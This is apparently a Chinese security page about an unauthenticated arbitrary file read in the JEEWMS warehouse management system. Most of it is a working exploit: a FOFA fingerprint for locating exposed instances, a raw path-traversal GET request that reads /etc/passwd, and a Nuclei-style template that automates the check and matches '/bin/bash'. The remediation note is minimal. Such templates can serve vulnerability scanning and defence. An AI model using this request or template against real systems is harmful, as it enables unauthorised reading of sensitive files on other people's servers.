JEEWMS基于JAVA的仓库管理系统(支持3PL(三方物流)和厂内物流),包含PDA端和WEB端,功能涵盖WMS,OMS,BMS(计费管理系统),TMS,成功应用于多家国内知名大客户,客户群体:冷链,干仓,快消品,汽车主机厂和配件厂等行业。JEEWMS存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取任意文件,造成敏感信息泄露。
body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/
id: JEEWMS-file-read
info:
name: JEEWMS存在任意文件读取
author: nobody
severity: high
description: |
JEEWMS基于JAVA的仓库管理系统(支持3PL(三方物流)和厂内物流),包含PDA端和WEB端,功能涵盖WMS,OMS,BMS(计费管理系统),TMS,成功应用于多家国内知名大客户,客户群体:冷链,干仓,快消品,汽车主机厂和配件厂等行业。JEEWMS存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取任意文件,造成敏感信息泄露。
impact: |
攻击者可以通过该漏洞读取任意文件,造成敏感信息泄露.
remediation: |
升级版本,打补丁
metadata:
verified: true
max-request: 3
fofa-query: body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
tags: JEEWMS,fileread
requests:
- raw:
- |
GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/bin/bash"
- type: status
status:
- 200
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.